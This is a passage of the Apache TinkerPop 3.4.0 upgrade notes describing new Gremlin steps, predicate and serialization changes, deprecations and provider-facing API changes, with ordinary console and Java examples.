WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Predicate Number Comparison\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq`, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could place return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior version of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly use graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP style loading, it can be utilized in conjunction with OLAP which\ninternally uses `CloneVertexProgram` and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOption` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== min() max() and Comparable\n\nPreviously `min()` and `max()` were only working for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values lead to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? [yN]\n----\n\nWith the changes in this release these kind of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n==== Python Bindings\n\nBindings were formerly created using a Python 2-tuple as a bit of syntactic sugar, but all other language variants\nused an explicit `Bindings` object which `gremlin-python` already had in place. To make all work variants behave\nconsistently, the 2-tuple syntax has been removed in favor of the explicit `Bindings.of()` option.\n\n[source,python]\n----\ng.V(Bindings.of('id',1)).out('created').map(lambda: (\"it.get().value('name').length()\", \"gremlin-groovy\")).sum()\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2116[TINKERPOP-2116]\n\n==== Deprecation and Removal\n\nThis section describes newly deprecated classes, methods, components and patterns of usage as well as which previously\ndeprecated features have been officially removed or repurposed.\n\n===== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. It's only real use was for testing remote bytecode based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n===== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n===== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to them on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n===== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n===== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n===== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequests messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n===== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider specific implementation that could be\nmore efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph` which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph\nsupports CSV or some custom graph specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored becaue it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean, that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations and while users can choose to utilize that\nmore verbose method for constructing it shown above, it is more elegantly constructed as follows using `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000)).V();\n----\n\nThe graph provider could then access that value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar that can be used as a test dependency in other modules.\nGenerally speaking, that approach tends to be a bad practice and can cause build problems with Maven that aren't always\nobvious to troubleshoot. With the removal of `giraph-gremlin` for 3.4.0, it seemed even less useful to have this\ntest artifact present. All tests are still present. The follow provides a basic summary of how this refactoring\noccurred:\n\n* A new `AbstractFileGraphProvider` was created in `gremlin-test` which provided a lot of the features that\n`HadoopGraphProvider` was exposing. Both `HadoopGraphProvider` and `SparkHadoopGraphProvider` extend from that class\nnow.\n* `ToyIoRegistry` and related classes were moved to `gremlin-test`.\n* The various tests that validated capabilities of `Storage` have been moved to `spark-gremlin` and are part of those\ntests now. Obviously, that makes those tests specific to Spark testing now. If that location creates a problem for some\nreason, that decision can be revisited at some point.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1410[TINKERPOP-1410]\n\n===== TraversalEngine Moved\n\nThe `TraversalEngine` interface was deprecated in 3.2.0 along with all related methods that used it and classes that\nimplemented it. It was replaced by the `Computer` interface and provided a much nicer way to plug different\nimplementations of `Computer` into a traversal. `TraversalEngine` was never wholly removed however as it had some deep\ndependencies in the inner workings of the test suite. That infrastructure has largely remained as is until now.\n\nAs of 3.4.0, `TraversalEngine` is no longer in `gremlin-core` and can instead be found in `gremlin-test` as it is\neffectively a \"test-only\" component and serves no other real function. As explained in the javadocs going back to\n3.2.0, providers should implement the `Computer` class and use that instead. At this point, graph providers should have\nlong ago moved to the `Computer` infrastructure as methods for constructing a `TraversalSource` with a\n`TraversalEngine` were long ago removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143]\n\n===== Upsert Graph Feature\n\nSome `Graph` implementations may be able to offer upsert functionality for vertices and edges, which can help improve\nusability and performance. To help make it clear to users that a graph operates in this fashion, the `supportsUpsert()`\nfeature has been added to both `Graph.VertexFeatures` and `Graph.EdgeFeatures`. By default, both of these methods will\nreturn `false`.\n\nShould a provider wish to support this feature, the behavior of `addV()` and\/or `addE()` should change such that when\na vertex or edge with the same identifier is provided, the respective step will insert the new element if that value\nis not present or update an existing element if it is found. The method by which the provider \"identifies\" an element\nis completely up to the capabilities of that provider. In the most simple fashion, a graph could simply check the\nvalue of the supplied `T.id`, however graphs that support some form of schema will likely have other methods for\ndetermining whether or not an existing element is present.\n\nThe extent to which TinkerPop tests \"upsert\" is fairly narrow. Graph providers that choose to support this feature\nshould consider their own test suites carefully to ensure appropriate coverage.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1685[TINKERPOP-1685]\n\n===== TypeTranslator Changes\n\nThe `TypeTranslator` experienced a change in its API and `GroovyTranslator` a change in expectations.\n\n`TypeTranslator` now implements `BiFunction` and takes the graph traversal source name as an argument along with the\nobject to translate. This interface is implemented by default for Groovy with `GroovyTranslator.DefaultTypeTranslator`\nwhich encapsulates all the functionality of what `GroovyTranslator` formerly did by default. To provide customize\ntranslation, simply extend the `DefaultTypeTranslator` and override the methods.\n\n`GroovyTranslator` now expects that the `TypeTranslator` provide to it as part of its `of()` static method overload\nis \"complete\" - i.e. that it provides all the functionality to translate the types passed to it. Thus, a \"complete\"\n`TypeTranslator` is one that does everything that `DefaultTypeTranslator` does as a minimum requirement. Therefore,\nthe extension model described above is the easiest way to get going with a custom `TypeTranslator` approach.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2072[TINKERPOP-2072]\n\n==== Graph Driver Providers\n\n===== Deprecation Removal in RemoteConnection\n\nThe two deprecated 